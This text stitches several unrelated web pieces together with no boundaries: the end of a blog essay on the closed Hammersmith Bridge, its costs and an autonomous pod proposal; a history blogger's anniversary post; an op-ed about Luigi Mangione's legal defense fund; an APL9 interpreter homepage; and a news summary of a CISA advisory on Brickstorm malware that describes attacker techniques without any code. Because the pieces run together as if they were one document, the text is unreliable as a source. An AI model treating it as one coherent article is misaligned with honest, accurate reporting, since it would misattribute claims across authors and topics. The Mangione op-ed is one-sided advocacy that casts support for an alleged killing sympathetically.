These aren’t individual failures but rather a systemic accumulation of red tape that paralyses progress.
The £250m restoration
The first challenging technical problem is solved: the bridge is now stabilised, albeit at significant expense.
But who will fund the complete restoration to return the bridge to its full operational capacity?
In April 2023, the local council submitted a business case to the DfT for full restoration.
That proposed solution is a double-decker system designed by Foster & Partners: vehicles on top, pedestrians in an enclosed tunnel underneath, walking through a dim passage while traffic roars above their heads.
The cost: £250m (and rising with inflation). The timeline: 10 years from approval, meaning 16+ years total since closure.
There is an irony. The entire justification for this solution is heritage preservation, yet this solution will encase the listed Victorian structure in a visual eyesore, forcing pedestrians into a claustrophobic tunnel, ruining the very heritage it claims to preserve.
Here’s where Britain’s infrastructure dysfunction becomes concrete.
Three players are each committed to funding one-third of any restoration: 17
London Borough of Hammersmith and Fulham (LBHF): Local council and bridge owner. £80m total reserves.
Transport for London (TfL) : Transport authority strategically responsible for river crossings but financially crippled despite government bailouts post-Covid. Faces a backlog of 100+ critical infrastructure repairs, with Hammersmith Bridge far down the priority list.
Department for Transport (DfT) : National government department, normally provides 85% funding for strategic bridge repairs but has slashed commitment to just 33% for Hammersmith.
Since LBHF submitted their restoration plan in April 2023, the DfT has sat on this business case.
Why have they delayed? It is very likely that the £250m restoration will fail the Treasury’s value-for-money tests, but nobody is yet willing to admit that publicly.
The benefits are modest: reconnecting two wealthy areas across a short river crossing with multiple alternatives nearby. The costs are astronomical: £250m for bespoke heritage restoration, taking 10+ years, with each party exposed to inflation risk.
For context, TfL only spent £42m in 10 years between 2010-2021 for the maintenance of all Thames river crossings.
Some would call Hammersmith Bridge a state capacity failure . But let’s be precise about what has actually failed.
Not engineering ability: British engineers remain world-class, and the stabilisation work completed so far is evidence of that. Not resources: the proposed cost is a rounding error in national budget terms.
What has failed is our political capacity: the ability to make decisions, assign responsibility, and accept trade-offs.
We’ve created a planning system in which every actor can block and add cost but where none can decide, where doing nothing is the safest choice.
In the vacuum left by years of inaction, a cottage industry of alternative proposals has emerged.
Baynes & Mitchell proposed a £110m interwoven structure. Sybarite’s inventive mirror-polished steel “ribbon” was dismissed as “another eccentric press stunt” by the council. Anthony Carlile Architects mocked up a temporary barge bridge . The Manser Practice held an internal competition yielding conceptual designs. The Richmond MP proposed licensed rickshaws . 18 LBHF council have “not ruled out” funding restoration via a resident-exempt vehicle toll (though this appears unviable on basic calculations), 19 whilst the DfT briefly considered permanent closure as a monument.
Even friends regularly offer enlightening new suggestions: inhabited bridges (funded through commercial and residential leases); a version of Wuppertal’s Schwebebahn (a public transport monorail operating since 1897); or London’s failed Garden Bridge . 20
The problem is not ingenuity. It is a system that blocks any decision-making.
Here is a more facetious proposal: award the contract to a Chinese state-owned operator.
Why China? Well, China’s bridge engineering operates at a scale that is difficult for those of us in a de-industrialised nation to comprehend.
At least 9 Chinese bridges have been built that would span the English Channel. 21
For instance, the 55km 6-lane trans-oceanic Hong Kong-Zhuhai-Macau Bridge features 23km of elevated sections, a 6.7km immersed vehicle tunnel at 45 metres below sea level, and four artificial islands , completed in just 9 years of construction . 22
The Huajiang Grand Canyon Bridge , completed in September 2025, is furnished with a “ cafe in the clouds ” and an artificial waterfall . It spans 2,890m at a height of 625m above the Beipan River and was built in less than 4 years for ~£220m ( 2.1 billion yuan ), less than the proposed restoration of Hammersmith Bridge. 23
In comparison t these mega-projects, Hammersmith Bridge seems rather modest.
But Britain is not China.
In terms of state capacity , China’s sustained construction programme generates continuous learning and accumulated expertise; Britain builds episodically and as much as half of its wage premium is due to costs rising without corresponding productivity gains. 24
But in terms of values : we demand zero construction deaths, fair wages, and democratic accountability. China’s infrastructure achievements are staggering, but they’re inseparable from its authoritarian system: bridges built without parliamentary debate, villages demolished, environmental concerns overridden, labour protections minimal. The costs mask 8-15 worker deaths per project and £1-8 daily wages and lower build quality. 25
Britain’s paralysis isn’t simply incompetence, it’s the cost of worker safety, political accountability and heritage protection.
The question is not “why can’t we build like China?” but “how do we deliver infrastructure within our political and value system?”
£250m for a restoration is an extraordinary sum of money, so how about we just build a new bridge altogether?
At the January 2025 Taskforce meeting , the DfT proposed a demolition and rebuild . This proposal was rejected as legally impossible given the structure’s Grade II listing. But the heritage protection framework is policy, not immutable law. The Grade II listing was only awarded in 2008.
What would it cost simply to demolish Hammersmith Bridge and build a modern replacement?
The brief (assuming permission were granted) would be demolish the existing structure and build a functional and safe 210-metre Thames bridge crossing at Hammersmith, carrying two vehicle lanes plus pedestrians and cyclists.
Answer : £150-225m . A complete replacement would most likely be a beam bridge and require 4-6 years from project start to completion. Overall contingency 20%. The full methodology for my estimate can be found in the footnotes. 26
There are two caveats to this estimate:
First, I’m not an engineer or architect. This estimate can in no way replace a detailed feasibility study, it is a back-of-the-envelope guess that offers a rough benchmark.
Second, this estimate underplays the vast range of uncertainty in UK infrastructure delivery . Although there is limited ambiguity in the engineering of the bridge itself, the current state of infrastructure construction in Britain means that the final price tag is highly uncertain.
Just compare other recent projects for Thames river crossings. The Rotherhithe Bridge saw costs triple from £100m to £463m before cancellation. The Lower Thames Crossing has spent over £300m on planning alone - more than Norway spent building the world’s longest road tunnel (the Laerdal Tunnel ). The Thames Tideway Tunnel escalated from £1.7bn estimate in 2004 to £4.5bn by completion in 2025. The Silvertown Tunnel cost £2.2bn for a straightforward 1.4km crossing. 27 Or consider High Speed 2 (HS2): £40.5bn spent to date (as of April 2025), having achieved very few of its stated aims. Final cost estimated at over £100bn in today’s money. 28 That includes the £100m bat tunnel and the £100m HS2 bridge to nowhere . 29
Even if the costs of a re-build were acceptable to the Treasury (they’re not) and the legal barriers were removed (they won’t be), demolition would destroy real value. £48m has already been spent stabilising the bridge and this is not simply sunk cost fallacy. The bridge now functions for cyclists, pedestrians, and motorised vehicles up to 3 tonnes, while retaining heritage significance no rebuild could match.
When projects routinely spend hundreds of millions just obtaining permission, throwing away a stabilised structure becomes hard to justify.
The bridge has been closed to motor traffic for six years. Primary school children in Barnes cannot remember when cars could cross. What began as an emergency closure has calcified into permanent car-free status through institutional paralysis.
The solution that is unfolding by default is to do nothing.
This has never been formally proposed, yet everyone’s inaction point towards it. Last month, bridge contractors filed a planning application requesting permission to transport Victorian ironwork to Brighton for long-term storage, indicating no prospect of restoration in the foreseeable future . 30 After all, it could take years or decades before political change unblocks this system to even enable a rebuild, if ever.
To do nothing would imply that vehicle access does not matter. The bridge isn’t really closed - you can still walk or cycle across. And that’s better, isn’t it? We don’t want cars in cities anyway, right? 31
No! A major London transport link has ceased to function, and there are currently no plans to address it. That should not be acceptable in a competently governed society.
We cannot accept this state of affairs.
But first, we must ask the right questions.
When I began researching this piece, my intuition was straightforward: closing a major bridge carrying 25,000 daily vehicles should lead to more traffic on other nearby crossings and less economic activity on either side.
The evidence shows the exact opposite. Today there is less traffic and more economic activity .
How is that possible?
To answer that question, we must understand:
What happened to the traffic?
What are the social and economic impacts of the closure?
Who has been genuinely disadvantaged?
When the bridge closed in 2019, 25,000 vehicles crossed it each day.
TfL predicted chaos: a July 2019 impact assessment showed 15,000 additional motorised vehicles per day on alternative crossings and estimated “social dis-benefits to exceed £50m per annum.” Local MPs still cite these figures.
But what does the data show six years on?
Today, there is less traffic and congestion on nearby Thames crossings than before the closure.
The data shows traffic has reduced in almost all the locations where increases were initially recorded. By 2024, overall motor traffic volumes across the affected region had fallen by around 10% more than in the rest of London (25% overall). Likewise, total traffic counts on neighbouring road bridges are lower than pre-closure (charts above).
Putney Bridge shows a different idiosyncratic effect. Traffic initially fell back after the closure in 2019, but delays began to increase in 2023. That sequence of events suggests that there are other variables unrelated to the closure that are impacting travel times.
Where did the traffic go?
Cycling data provides part of the answer. Richmond Council’s survey revealed that even a few months after closure, 44% of former drivers had already switched to walking or cycling.
Cycle counts across the area are also markedly increased. This is known in the literature as a “ modal shift ”. Richmond-upon-Thames now has one of the highest active travel mode shares in Britain.
So, of the original 25,000 daily trips, most shifted to cycling, walking and public transport, and some moved to other bridges.
But here’s the puzzle: TfL reports that 9,000 vehicles (36%) have simply vanished from the road network entirely - they are no longer visible on any crossing between central London and southwest London.
What happened to those 9,000 journeys that simply evaporated?
Was economic activity lost? Were human connections severed? Did relatives stop visiting grandparents? Did businesses stop making deliveries?
The answer may lie in a counterintuitive phenomenon known as Braess’ Paradox : adding capacity to a congested network can worsen performance, while removing it can improve things. 32
When drivers make individually rational routing decisions, they reach an equilibrium where no single driver benefits from changing route, but this equilibrium is often inefficient for the system as a whole.
In Hammersmith’s case, the closure forced a new equilibrium. The 9,000 vanished vehicles weren’t displaced elsewhere, nor did they represent lost economic activity. They were replaced by alternatives that were more efficient in the new system.
The shopper who made three separate car trips weekly now combines errands or orders online from consolidated delivery services. The school run that meant queueing in traffic now happens on foot or by bike. The commuter who spent 20 minutes driving and searching for parking now cycles in 12 minutes.
After tube strikes, 5% of commuters permanently switch because disruption forces them to discover faster alternatives.
Hammersmith Bridge’s closure worked similarly: people tried new transport modes and often found they were better. 33
When the bridge closed, TfL predicted economic contraction. The opposite occurred.
Mastercard data shows spending in Barnes increased by twice the London average. 34 Spending increased +21% in Barnes (SW13) and +13% in Hammersmith (W6), compared to London’s +9% average. This held even when the bridge was closed to pedestrians and cyclists.
However, this aggregate spending increase does mask a more nuanced set of changes in local business composition. Data from the same Barnes Community Association survey in 2020 suggested that specialist retailers that previously relied on cross-river customers experienced revenue declines, whilst local businesses serving residential communities tended to adapt most successfully. 35
As soon as 2020, the closure appears to have reshaped Barnes’ commercial character towards neighbourhood-focused businesses rather than destination retail, potentially strengthening its role as a local high street. Now, six years later, the local economy has entirely adapted to the new reality.
Reduced pollution likely increased dwell time and spending given that air quality improved at every monitoring station across the region, with nitrogen dioxide levels dropping significantly in Hammersmith, most of Barnes, and even Putney.
Emergency services have reported no impact on response times . The London Ambulance Service stated they have “never released any information about the closure impacting response times,” whilst London Fire Brigade data shows no increase in 999 response times in the Barnes peninsula.
West London’s economy hasn’t contracted; it has adapted. This isn’t suppression of activity; it’s optimisation. Economic vitality requires efficient connectivity, not maximum motorised vehicle throughput.
However, there are important confounding factors .
Since 2019, the entire urban transport landscape has transformed through three major forces largely independent of the bridge closure.
The pandemic (normalising remote work and collapsing commuter traffic), regulatory changes (Low Traffic Neighbourhoods, ULEZ expansion, 20mph zones), and new infrastructure (Elizabeth line, expanded cycling networks).
Disentangling the bridge closure’s impact from these confounding factors is nearly impossible, so it is not possible to attribute all these changes definitively to the bridge closure.
But one impact is clear: west London has adapted to reduced car dependency regardless of whether the bridge closure drove or merely coincided with these changes.
It is not necessarily the case that closing bridges improves transport; but it is undeniably true that people and places adapt when given alternatives.
Infrastructure shapes behaviour.
The closure has created genuine hardship for specific groups.
Elderly and disabled residents have been significantly disadvantaged, having lost direct bus routes across the river to Hammersmith with its step-free Tube access, retail outlets and major hospital. 36 Low-income residents have been disproportionately affected. They’re less likely to own cars or bikes, cannot afford taxi detours, and have lost affordable public transport options. Parents with young children face new challenges. Cycling is not always an option, so any journey across the river has become significantly harder.
Specialised retailers have also lost business. Whilst generic local businesses saw spending increases, specialised retailers relying on customers from across London experienced revenue reductions. Similarly, tradespeople and businesses requiring vehicle access face longer detours. Plumbers, electricians, and builders transporting heavier tools lose time and income. Commercial motorised vehicles merit particular attention given ULEZ parallels, where delivery operators have raised concerns about regulatory burdens. However, unlike ULEZ, the bridge closure affects routing rather than compliance costs.
As a local resident who crosses the bridge every week, I see both sides of this argument:
For certain residents and businesses, the closure has created genuine hardship. Equally, however, the constant gridlock has vanished, the local economy has adapted, and cycling - previously a life-threatening exercise - is now pleasant and safe.
The harms are real, but they do not require a £250m car-restoration project. They require targeted public transport solutions.
Ask residents if they want the bridge reopened to all traffic and the answer is obvious: yes.
Maximum choice will always seem the most convenient option.
But that is the wrong question to be asking. As we have established, a full restoration would cost £250m, take years, and likely require a significant vehicle toll.
Given that reality, what’s the best option?
A 2023 poll tested this exact trade-off, and the response from residents was clear. If the alternative was a toll bridge, 50% of respondents would prefer a car-free bridge with cycling, walking and electric shuttles, with 36% in favour of tolling. Similar results were shown in a FareCity survey from 2019.
Given the actual constraints and costs, residents prefer targeted public transport solutions over expensive vehicular restoration.
Finally, we should address a claim that has shaped the entire debate.
Labour Council leader Stephen Cowan has repeatedly stated that the bridge is “legally required to reopen to cars,” indicating that the Secretary of State instructed him on the council’s “Highways obligations.” This assertion has anchored political negotiations around how to restore full vehicular capacity. Mayor Sadiq Khan has also expressed a desire to re-open the bridge to cars .
But in November 2022, the Department for Transport’s Freedom of Information response categorically contradicted this claim:
“The Department has not given any legal instructions to London Borough of Hammersmith and Fulham regarding the management of the bridge – officials and Ministers have been clear that LBHF is the asset owner and decisions on maintenance and repair are for it to take.”
As the owner, there is no clear legal requirement for the Council to reopen the bridge to cars (as they have likely met their statutory obligations, 37 although any formal highway downgrading would require Traffic Regulation Orders under established statutory procedures). 38
This distinction is not semantic pedantry. If the obligation is political rather than statutory, then the solution space is fundamentally different. The council is not legally bound to pursue a £250m vehicular restoration. It could instead solve the actual mobility problem: providing public transport across the river for those who need it (which may itself be a statutory obligation). 39
Yet this premise has locked the debate around restoring the existing structure to full vehicular capacity.
So what might a solution look like?
In May 2023, a credible and equitable solution for Hammersmith Bridge was proposed, fully designed and costed.
It cost £10m (25x cheaper than the Foster & Partners solution), permitted cycling and walking, fulfilled public transport needs, and crucially abided by the stabilisation’s weight restrictions.
Ten-passenger autonomous electric pods , running every 2-3 minutes during peak times. Each pod weighs under 3 tonnes when fully loaded , comfortably within the bridge’s limits. The fleet would carry 235-282 passengers per hour . Full integration with Oyster cards and contactless payment. A protected two-way cycle lane alongside and pedestrian walkways. Restructured bus routes. The pods would operate in a single lane with passing points at either end. 40
Total cost: £10m . Pod fleet (£3m), highways remodelling (£3.7m), public realm improvements (£0.5m), contingency (£2.8m). Timeline: 24-36 months from approval to operational.
The charity Possible spent 18 months developing this autonomous pod system for Hammersmith Bridge. The solution uses proven technology from New Zealand provider Ohmio . The pods are already used today in New Zealand and multiple international airports .
This solution addresses the genuine harms identified earlier. The autonomous pod system provides:
Public transport for those without alternatives : elderly and disabled residents regain direct access to Hammersmith with step-free boarding, young families can cross safely, low-income residents get affordable Oyster-integrated transport.
Reduced congestion for essential and commercial vehicle users : with 9,000 trips already evaporated and additional travellers using pods, tradespeople and businesses would experience a net benefit from reduced congestion on alternative crossings.
This is why the pod solution isn’t just cheaper than the £250m restoration - it’s better.
Why autonomous pods rather than conventional public transport? Standard buses weigh 12-18 tonnes, far exceeding the bridge’s 3-tonne limit. Trams require expensive track infrastructure and permanent structural modifications, the weight of which would be incompatible with heritage constraints. 41 Autonomous pods solve this through lightweight design: each 10-passenger pod weighs under 3 tonnes fully loaded, with ten pods providing equivalent capacity whilst staying within structural limits. The system eliminates driver costs (60-70% of bus operating expenses) whilst enabling 2-3 minute headways impossible with human drivers, maximising throughput and cost-efficiency.
Would the pods risk obsolescence? After all, a restored bridge might serve for decades while autonomous technology is evolving rapidly. But in a rapidly changing transport landscape, the pods deliver adaptable infrastructure with manageable operating costs. Vehicles can be upgraded as technology improves at minimal cost and could be operated publicly like TfL services or through private concession with access leasing and passenger charges. In any case, the pods cost a fraction of the £250m restoration which would likely require perpetual subsidy for changing traffic patterns.
Barriers to implementation exist, but none are insurmountable. The Automated Vehicles Act 2024 already provides a legal framework, while Milton Keynes and Solihull already operate these exact Ohmio vehicles on public roads. The most likely bridge-specific challenges such as weight certification, vibration testing, structural approval are procedural requirements, not engineering barriers.
This proposal solves the actual mobility problems faced by local communities rather than restoring a traffic pattern that was already causing gridlock.
Here is the digital visualisation of the proposal (no sound):
What happened to this proposal?
The Centre for Connected and Autonomous Vehicles offered £200,000 for feasibility studies. Possible assembled a consortium including Ohmio, City Science, and City Infinity. Richmond Council and TfL both agreed to support if Hammersmith & Fulham agreed.
Hammersmith & Fulham refused to engage. The deadline passed. The consortium disbanded.
Since then, Ohmio has begun trials in Solihull and Milton Keynes . Waymo and Wayve will trial autonomous taxi services in London in 2026.
The opportunity for the UK’s first autonomous public transport deployment was lost, but the solution remains viable.
What needs to happen now?
End the pretence. LBHF, TfL and DfT must publicly acknowledge what everyone privately knows : the restoration (£250m+) is unfunded and any replacement (£150m+) is equally unfundable.
Open a competitive tender. Tender for public transport solutions within the stabilised bridge’s 3-tonne weight limit. Offer clear requirements: passengers per hour, Oyster-integrated, delivery timeline.Let the market find the most cost-effective solution. Fast-track regulatory approval for the winning proposal. No multi-year planning inquiries for a bridge that’s already been closed for six years.
Create the destination, invest in the approaches. All three bodies also need to invest in regenerating areas at either end: the retail outlets, cycling infrastructure, public realm upgrades, drainage improvements (co-ordinate with the Hammersmith Flyover redevelopment if that proceed).
Recently, there have been some more positive signs. Various local politicians have begun to more clearly express support for prioritising a public transport solution over simply re-introducing cars. LBHF recently trialled yellow rental carts, demonstrating an appetite for testing new modes of transport.
The Possible proposal would have been the UK’s first autonomous vehicle deployment in real-world public transport.
Hammersmith Bridge offers the perfect testing ground: dedicated straight lanes, low speed, controlled environment. The Government has stated its ambition for technology leadership in autonomous vehicles.
That opportunity was lost when LBHF refused to engage, but the solution remains viable.
The bridge is stabilised. The community has adapted. The technology exists. What’s required is simply the political will to choose the future.
Hammersmith Bridge could become a place where Victorian ironwork frames cutting-edge technology. London’s greenest historic crossing could be the testing ground for Britain’s most advanced public transport solution.
Picture it at dusk: Victorian lampposts glowing, pods gliding silently past, cyclists heading home, the swans gliding along the Thames below. The bridge would no longer be a bottleneck that motorists endure, but a bridge people choose to cross.
Designed thoughtfully, Hammersmith Bridge’s public transport vehicles could become a timeless and recognisable feature of London’s urban landscape, alongside other distinctive British icons — red telephone boxes, double-decker buses, or black cabs.
That’s the future for Britain that we should be building - one that is even more beautiful than the past we’re failing to resurrect.
Hammersmith Bridge can be one of the greatest river crossings in the world.
Please do get in touch if you are in a position to help solve this challenge or have any feedback.
Let’s build the future.
Will this solution help us solve the vast problem of Britain’s state crisis?
Of course not. 42
But Hammersmith Bridge teaches a lesson.
Here, the intuitive question based on past assumptions was “how do we restore full vehicular capacity?” The real question we should have been asking ourselves is “how do we solve this mobility problem to ensure a better future?”
While we debate how to restore Victorian infrastructure for outdated traffic patterns, the actual future, autonomous and mass public transport, is materialising around us.
In that sense, Hammersmith Bridge serves as a warning.
If we can’t adapt our thinking here, what hope is there for the toughest problems that we face? For the infrastructure that Britain actually needs to build? For the critical state capacity that we most urgently need to develop? 43
Hammersmith Bridge is the case study; now Britain must start asking the right questions.
This essay was possible because kind people cared enough to help.
Above all, I would like to thank Leo Murray , who led the charity Possible and wrote a definitive report on Hammersmith Bridge which informed so much of this information in this piece.
Tom Pike, Tim Lennon, and Charles Campion generously shared their expertise, data, and years of work on this problem. Their rigorous research and genuine commitment to solving the bridge’s crisis made this analysis possible.
The Looking for Growth team , Lawrence, Ludo, and Jack, provided invaluable support and encouragement throughout.
I am deeply grateful also to friends Quentin, Aeron, Paramvir, Bob and Jemima, who read early drafts and offered thoughtful feedback.
Finally, my most sincere apologies to every friend, family member, and innocent bystander who endured my monologues about Hammersmith Bridge these past months.
Thanks for reading Suburban Mantuan! This post is public so feel free to share it.
Disclaimer : All posts on this site reflect my personal views only and should not be construed as investment, financial, or professional advice. These views do not represent my employer or any affiliated organisation.
Possible & Leo Murray (2024) Hammersmith Bridge Report
Tim Lennon (2024) Hammersmith Bridge
Barnes Community Association & Emma Robinson (2020) The Impact of the Closure
LBHF Resources:
LBHF (2025) Hammersmith Bridge
LBHF (2024) Stabilisation Works
LBHF (2020) Hammersmith Bridge Timeline
Local Groups:
I was 25 years old when I started writing the blog version of Res Obscura, which ran from 2010 to 2023 (and still exists here ). This was the early summer of 2010. I was a second-year PhD student in history, living with two roommates in a 1920s bungalow on the east side of Austin.
And I was very dedicated to the idea that you should aim to write a new blog post every day:
This is a concept that the 40-year-old version of me, with two young kids and zero free time, cannot even begin to fathom.
It’s also a practice of the old internet that simply doesn’t exist anymore — one of many digital behaviors that was swallowed up by social media. That whole world of blogging (exploratory, low-stakes, conversational, and assuming a readership of people who had bookmarked your URL and who read it on a desktop or laptop computer) is almost entirely gone now.
My first two years writing Res Obscura in its blog format were great fun. I began to develop an intellectual community, forming contacts with, for instance, the wonderful Public Domain Review (founded 2011 and still going strong). I linked to and was linked to by a range of other history bloggers who I saw as kindred spirits, some of whom seem to have disappeared ( BibliOdyssey ) others of whom have become well-known writers ( Lindsey Fitzharris ).
It was pretty addictive when a post went viral. In those halcyon days when written blog posts about obscure historical subjects were viable sources of viral content, you could end up getting covered in international media for, say, discovering a cat’s paw prints on a 15th century Croatian manuscript.
That spike in readership around 2018 was partially from a post about 17th century food that, unexpectedly, led to me speaking about snail water on New Zealand public radio .
But by then, I was starting to move on. I was hard at work on my first book — the book I needed to write for tenure — and was becoming a bit dispirited by the increasingly click-bait nature of blogging, not to mention the tendency of social media to elevate toxic behavior and controversy over lovely and fascinating but totally uncontroversial things like the Croatian cat paw prints.
I also (then and now) have no appetite for short-form video content, and still less for the type of history explainer videos — “here’s a two hour deep dive into why this movie is historically inaccurate” or “everything you need to know about such-and-such famous person” — that seem to do well on YouTube.
Switching over to a Substack newsletter, in the summer of 2023 , revived my interest in writing online. It felt like rejoining an intellectual community — not quite the same as the golden age of blogging in the 2000s, but something equally as lively, in a way that I don’t think quite gets enough credit in the 2020s.
From Weird Medieval Guys to
’s Noted to
’s Fernando Pessoa-esque The Hinternet and the newsletters of well-known historians like David Bell ( French Reflections ), as well as the more general audience or politically oriented newsletters that still dig deep into historical topics (like
’s Unpopular Front and
’s newsletter ), I would say that Substack is now the most interesting place online for discussions not just of history, but of humanistic topics as a whole.
Needless to say, there’s also a ton of people writing about the intersection of AI, technology and contemporary society (of which I would single out AI Log , Ethan Mollick’s One Useful Thing ,
, and
).
So why have I kept writing Res Obscura through all the changes of the world — and of my own life and interests — since the summer of 2010? Simple: I love sharing things I find interesting, especially things which are not available elsewhere online. Most of my posts are written because I search for information on something and don’t find it.
The niche nature of Res Obscura (from 17th century cocaine to Kinetoscopes to Henry James: the RPG ) is precisely why I enjoy writing it.
I am deeply grateful that 15 years and 8,300 subscribers later, I have a place online where I can share idiosyncratic knowledge and writing with an equally idiosyncratic group of readers.
Now here’s the inevitable part where I ask if you would be willing to support my continued work. To that end, I have set up a special holiday discount valid until the end of December. Thank you for reading!
A detail of a trompe-l’œil “dome” by the Renaissance painter Andrea Mantegna , Camera degli Sposi, Ducal Palace, Mantua, Italy. Featured in a 2011 Res Obscura post called “ The Art of Fooling the Eye .”
Sam Beard is a spokesperson for the December 4 Legal Committee, whose book Depose: Luigi Mangione and the Right to Health is available for pre-order at illwilleditions.com.
Luigi Mangione’s legal defense fund has swelled to more than $1.3 million and is still growing daily. As the December 4 Legal Committee, we created that fund — but it would mean nothing without the donations, prayers, and support of people from around the world. As corporate social media platforms censored support for Luigi , the fundraiser page became a place for people to share stories of senseless death and suffering at the hands of the for-profit health insurance industry in this country.
There is a deep irony in the widespread support for Luigi. People celebrate an alleged murderer not because they hate reasonable debate or lust for political violence, but out of respect for themselves and love for others. Across the political spectrum, Americans experience the corporate bureaucracies of our health care system as cruel, exploitative, and maddening. They feel powerless in the face of the unnecessary dehumanization, death, and financial ruin of their neighbors and loved ones.
One year ago, the December 4 killing of United Healthcare CEO Brian Thompson temporarily suspended the usually intractable left vs. right polarization of America. Ben Shapiro’s audience revolted when he accused Luigi supporters of being “evil leftists.” Donors to Luigi’s fund come from across the political spectrum, and a common theme among them is their acute realization that the political differences of the culture war are largely manufactured to benefit the powerful. This was a crucial difference between Mangione’s alleged act and, for example, the assassination of Charlie Kirk . While the latter intensified existing political divides , the former seemed to strike upon the common ground of a different political landscape: from red vs. blue, or left vs. right, to down vs. up .
But a year on, it is clear that even bipartisan public support for killing a health care CEO on the street and the endless stories of suffering and death as a result of insurance claim denials are not enough to depose the for-profit health care system. Today, Medicare for All looks even more politically unrealistic than when Bernie Sanders made it the centerpiece of his presidential campaign.
This fact poses a challenge for Luigi’s supporters: Will his alleged act be remembered as nothing more than a salacious contribution to the true crime genre? Will we settle for him being installed as an edgy icon of celebrity culture, used to market fast-fashion brands and who knows what next?
We do not think his supporters, or anyone else who believes that health care is a human right, should accept that. But what would it take to make the events of last December 4 into a movement to build a more humane health care system in America?
The time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.
For the last year, we have been asking this question of medical professionals, community organizers, scholars, and ourselves.
In our forthcoming book , “Depose: Luigi Mangione and the Right to Health,” we offer the beginnings of an answer: The history of the struggle for the right to health in America shows that it is indeed politically unrealistic to expect politicians to deliver it from above — but our own dignity and intelligence demands that this right be asserted by all of us from below. The widespread support for Luigi shows that the time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.
Consider the sit-in movements to end Jim Crow laws and desegregate American cities. These were protests, insofar as participants drew attention to unjust laws — but they were also political direct actions. Organizers were collectively breaking those laws, and in doing so, were enacting desegregation . Activists organized themselves to support and protect each other in collectively nullifying laws that had no moral authority and, in the process, acted as if they were already free. This is what we mean by a shift from protest to direct action.
Less well known is the role of direct action in winning the eight-hour workday . For half a century, industrial workers had been struggling to shorten their hours so they could have some rest and joy in their lives. One decisive moment in this struggle came in 1884, when the American Federation of Labor resolved that two years later, on May 1, their workers would enact the eight-hour day. After eight hours, they would go on strike and walk off the job together. They called on other unions around the country to do the same and a number did — including in Chicago, where police deployed political violence to attack striking workers, killing two. While this action did not immediately win the struggle everywhere, it did succeed in beginning to normalize the 8-hour day and raised the bar for everywhere else to eventually do the same. The key is that this could only happen when workers stopped demanding something politically unrealistic and started changing political reality themselves.
The struggle for the right to health care has been ongoing in the United States for at least a century. At every turn, it has been thwarted by industry lobbyists and the politicians they control . But what would it look like to strategically shift the struggle for the right to health care in the U.S.? How would health care providers go on strike or engage in direct action without harming patients?
We found the beginning of an answer from Dr. Michael Fine, who has called on his fellow physicians to organize for a different kind of strike: not halting all their labor, but stopping the aspects of their work that are unrelated to their responsibility as healers. Fine writes, “We need to refuse, together, to use the electronic medical records until they change the software so that those computers free us to look at and listen to patients instead of looking at and listening to computer screens.”
All of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.
A strike by health care workers could mean not the cessation of care, but liberating this critical work from the restraints imposed by profit-seeking companies . Beginning from this idea, all of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.
If we step outside of our usual political bubbles and into a direct action movement to assert the universal right to health care, we might find that the common ground that Luigi’s alleged actions exposed is the precise point from which the wider political landscape may be remade.
This is the website for APL9, which is an APL implementation written in C on and for Plan 9 (9front specifically, but the other versions should work as well).
Work started in January 2022, when I wanted to do some APL programming on 9front, but no implementation existed. The focus has been on adding features and behaving (on most points) like Dyalog APL . Speed is poor, since many primitives are implemented in terms of each other, which is not optimal, but it helped me implement stuff easier.
Note: development is still very much on-going. Some primitives may be implemented wrong at this point, since it can be hard to implement them without ever having used them ☺.
For more information, see Implementation Status .
⍺⍺
is changed to
⍶
⍵⍵
is changed to
⍹
∘.
is changed to
⌾
∇∇
is changed to
∆
and
⍙
for monadic and dyadic operators respectively
Installation is as simple as cloning and running
mk
.
git/clone https://git.sr.ht/~pmikkelsen/APL9
cd APL9
mk
% set the BIN environment variable if
% you don't want it to install globally
mk install
The resulting binary is installed as
apl
. At the time of writing, it doesn't take command line arguments (apart from -t and -m for debugging).
Remember to use a font that can display the glyphs! To be able to write the apl glyphs, a small script is provided with the name
aplkeys
which works on 9front. Usage is as follows:
% Say my normal kbmap is called dk, but I want to be able to write APL symbols
aplkeys dk
The layout is mostly as the one on X11 on linux, but the way to access the symbols are different. In order to get the "normal" layer, such as
⍺⍳⍵∊*
and so on, hold down Mod4 (the windows key) while typing (in this case, typing aiwep). To access the other layer, hold down Mod4 and Alt-gr at the same time, to get
⍶⍸⍹⍷⍣
and so on. Please email me if you have questions about this.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware.
In a joint malware analysis report with the National Security Agency (NSA) and Canada's Cyber Security Centre, CISA says it analyzed eight Brickstorm malware samples.
These samples were discovered on networks belonging to victim organizations, where the attackers specifically targeted VMware vSphere servers to create hidden rogue virtual machines to evade detection and steal cloned virtual machine snapshots for further credential theft.
As noted in the advisory, Brickstorm uses multiple layers of encryption, including HTTPS, WebSockets, and nested TLS to secure communication channels, a SOCKS proxy for tunneling and lateral movement within compromised networks, and DNS-over-HTTPS (DoH) for added concealment. To maintain persistence, Brickstorm also includes a self-monitoring function that automatically reinstalls or restarts the malware if interrupted.
While investigating one of the incidents, CISA found that Chinese hackers compromised a web server in an organization's demilitarized zone (DMZ) in April 2024, then moved laterally to an internal VMware vCenter server and deployed malware.
The attackers also hacked two domain controllers on the victim's network and exported cryptographic keys after compromising an Active Directory Federation Services (ADFS) server. The Brickstorm implant allowed them to maintain access to the breached systems from at least April 2024 through September 2025.
After obtaining system access, they've also been observed capturing Active Directory database information and performing system backups to steal legitimate credentials and other sensitive data.
To detect the attackers' presence on their networks and block potential attacks, CISA advises defenders (especially those working for critical infrastructure and government organizations) to scan for Brickstorm backdoor activity using agency-created YARA and Sigma rules, and block unauthorized DNS-over-HTTPS providers and external traffic.
They should also take inventory of all network edge devices to monitor for suspicious activity and segment the network to restrict traffic from demilitarized zones to internal networks.
"CISA, NSA, and Cyber Centre urge organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify BRICKSTORM malware samples," the joint advisory urges. "If BRICKSTORM, similar malware, or potentially related activity is detected, CISA and NSA urge organizations to report the activity as required by law and applicable policies."
